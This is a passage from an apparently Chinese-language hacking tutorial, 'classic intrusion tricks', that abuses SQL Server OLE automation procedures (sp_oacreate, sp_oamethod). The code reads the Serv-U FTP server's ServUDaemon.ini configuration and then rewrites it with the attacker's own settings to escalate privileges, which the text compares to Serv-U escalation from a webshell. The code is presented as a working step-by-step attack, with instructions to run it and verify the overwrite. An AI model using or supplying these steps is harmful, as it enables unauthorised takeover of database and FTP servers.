几个用过的经典入侵技巧整理

exec @ret = sp_oamethod @f, ’readline’, @line out

while( @ret = 0 )

begin

print @line

exec @ret = sp_oamethod @f, ’readline’, @line out

end

★

这段代码的意思是通过使用存储过程来读取d:Serv-U6.3ServUDaemon.ini里的配置信息，返回执行成功 如图2

图片看不清楚？请点击这里查看原图（大图）。

既然可以读了 那么我们是不是可以写一个进去？继续执行

★

declare @o int, @f int, @t int, @ret int

exec sp_oacreate ’scripting.filesystemobject’, @o out

exec sp_oamethod @o, ’createtextfile’, @f out, ’d:Serv-U6.3ServUDaemon.ini’, 1

exec @ret = sp_oamethod @f, ’writeline’, NULL, 《这里添写自己写好的SU配置信息，刚才复制的那些都要写上去，在最后添加我们自己的，跟我们在WEBSHELL里的serv-u提权是一样的》

★

按F5，执行一下，发现命令执行成功，马上使用上面的语句复查一下，发现已经写进去了，如图3。

图3

图片看不清楚？请点击这里查看原图（大图）。